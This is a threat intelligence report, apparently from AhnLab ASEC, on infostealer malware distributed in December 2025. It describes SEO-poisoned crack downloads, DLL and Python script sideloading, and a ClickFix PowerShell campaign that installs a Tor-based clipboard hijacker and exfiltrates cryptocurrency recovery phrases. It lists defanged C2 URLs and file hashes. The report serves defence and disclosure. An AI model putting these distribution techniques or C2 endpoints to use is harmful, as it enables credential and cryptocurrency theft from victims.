December 2025 Infostealer Trend Report
This report provides statistics, trends, and case information on Infostealer malware collected and analyzed during the month of December 2025, including distribution volume, distribution channels, and disguising techniques. The following is a summary of the report.
1) Data Source and Collection Method
The AhnLab SEcurity intelligence Center (ASEC) operates various systems to automatically collect and distribute malware for proactive threat response. The collected malware is analyzed by an automated system to determine its maliciousness and C2 information. The relevant information is provided in real-time through the ATIP IOC service, and additional information can be found on the ATIP File Analysis Information page.
AhnLab’s self-developed system
- Crack and patch concealment malware automatic collection system
- Email honeypot system
- Malware C2 automatic analysis system
ATIP Real-time IOC service
C2 and Malware Type Analysis Information
- File Analysis Information – Related Information – Contacted URLs
It is recommended to use the statistics in this report to gain an overall understanding of the distribution volume, disguise techniques, and trends of distribution of Infostealer malware. 2) Infostealer Distributed with Crack Disguise These statistics are about Infostealer malware being distributed disguised as illegal programs such as cracks and keygens. The malware is distributed using the strategy of making the distribution posts appear at the top of search engine results (SEO poisoning). ASEC has established a system that automatically collects malware distributed in this manner and analyzes their C2 information to block the C2 in real-time, as well as provide relevant information through ATIP. In December, ACRStealer, LummaC2, and Stealc Infostealer were the most widely distributed.
Figure 1. Page distributing malware
Over the past 2025, the following chart shows the amount of malware distributed using this method. The second legend shows the amount of malware collected by AhnLab before the relevant information was available on VirusTotal. This shows that AhnLab first collected and responded to the majority of malware using the automatic collection system.
Chart 1. Quantity of Malware Distributed Annually
Previously, threat actors directly posted articles on blogs they created to distribute malware, but search engines began taking measures to prevent such malicious blogs from appearing in search results. To circumvent this, threat actors are now posting articles on legitimate websites to distribute malware. They are utilizing famous forums, Q&A pages of specific companies, free boards, comments, etc. The following image shows an example of posts for distributing malware uploaded to various communities. Posts uploaded in this manner appear at the top of search engine results and are visited by many users. Recently, there has been a growing trend of threat actors attacking poorly managed WordPress websites to post distribution articles.
Figure 2. Posts on the local newspaper website in Korea
As shown above, there are two types of execution methods for the Infostealer being distributed: one is distributed in EXE format, and the other uses the DLL Sideloading technique, which involves placing a legitimate EXE file and a malicious DLL file in the same folder so that when the legitimate EXE file is executed, the malicious DLL file is loaded. In December 2025, 65.8% of malware were distributed in the EXE format, while 34.2% were distributed using the DLL Sideloading technique. Compared to the previous month (November 2025), the distribution of malware using the DLL SideLoading technique has significantly decreased. This is likely due to the decrease in the distribution of downloaders that were heavily distributed using the DLL Sideloading technique. Malware using the DLL Sideloading technique are created by modifying a part of a legitimate DLL file into malicious code, so they bear a strong resemblance to the original file. As a result, there have been many cases in which other security products have classified these files as legitimate, underscoring the importance of staying vigilant.
Trend #1
– Malware Distribution via Abusing Python (Python Sideloading)
A recent case revealed that attackers distributed malware by abusing Python. The attacker directly tampered with and injected malicious code into a specific Python script (.py) inside the legitimate Python library folder (Lib). They then packaged this modified script together with a legitimate Python executable into a compressed archive and distributed it. Because certain scripts within the Lib directory are executed automatically when the legitimate Python executable is launched, the attacker‑modified script is triggered as part of the normal initialization process—allowing the embedded malicious code to run without raising suspicion.
– Path
.\Lib\encodings\aliases.py
– md5
5cabcab4233affa40bb8ddd846270779 (Downloader/Python.Stealer)
– c2
hxxps://globalsnn3-new[.]cc/newSide.forester
The malware inserted by the threat actor behaves by accessing the C2 URL via mshta, and it was later confirmed that this behavior led to the execution of ACRStealer malware.
Figure 3. Python script with malicious command
Previously, threat actors have mainly relied on modifying Python DLL files to deliver payloads through DLL sideloading techniques. However, in this case, the attackers took a different approach. Instead of tampering with executables, they abused a Python script (.py) itself to distribute the malicious payload.
Trend #2
– Distribution of Cryptocurrency‑Stealing Malware Leveraging Tor
Malware designed to persist on a victim’s system and steal cryptocurrency is being actively distributed. In the campaigns observed in December, attackers employed the ClickFix technique and compromised WordPress websites to mass‑publish malicious posts. When a user enters a CAPTCHA code on one of these posts, a malicious PowerShell command and a copy button become visible, prompting the user to execute the command manually through PowerShell.
Figure 4. Post distributing malware
When a user executes the command, malware is downloaded from the C2 and run. The malware creates a JavaScript malware, a Tor Client file, a JOB file used for malicious behavior, and a text file containing BIP39 keywords in the public user directory.
Once executed, the command downloads and runs the malware from the attacker’s C2 server. The malware then creates several components in the public user directory, including a malicious JavaScript malware file, a Tor client executable file, task scheduler job file, and a text file containing BIP39 recovery keywords.
Figure 5. Folder for creating malware
The JavaScript malware is registered in the Windows Task Scheduler to run periodically, launching the Tor client executable named “ugate.exe” and using this process to communicate with the C2 server via the Tor network. To evade detection, the malware suspends its activity and terminates when Task Manager is opened.
One of its primary behaviors is monitoring the clipboard. When it detects a cryptocurrency wallet address, it replaces it with the attacker’s wallet address. Additionally, if BIP39 mnemonic phrases are detected, the malware exfiltrates them to the C2 server. Since BIP39 strings serve as key recovery phrases for cryptocurrency wallets, their exposure enables attackers to gain full access to—and potentially drain—the victim’s wallet.
Figure 6. Data transmitted to the C2
– MD5
997748c5b3e24c6f42e63445bb252501 (EXE – Trojan/Win.PyAgent.R751791)
720bb8ccaa694dff1231f0876343fe0e (JS – Trojan/JS.Toragent.S3133)
– C2
hxxps://activatesoftinc[.]icu/zinfoz.dat (Powershell)
hxxp://cgky6bn6ux5wvlybtmm3z255igt52ljml2ngnc5qp3cnw5jlglamisad[.]onion/route.php (JS)
For more information on statistics not covered in this summary, statistics on the disguised target companies and original file names, distribution, and products, as well as information on Infostealers through phishing emails, please refer to the full ATIP report.
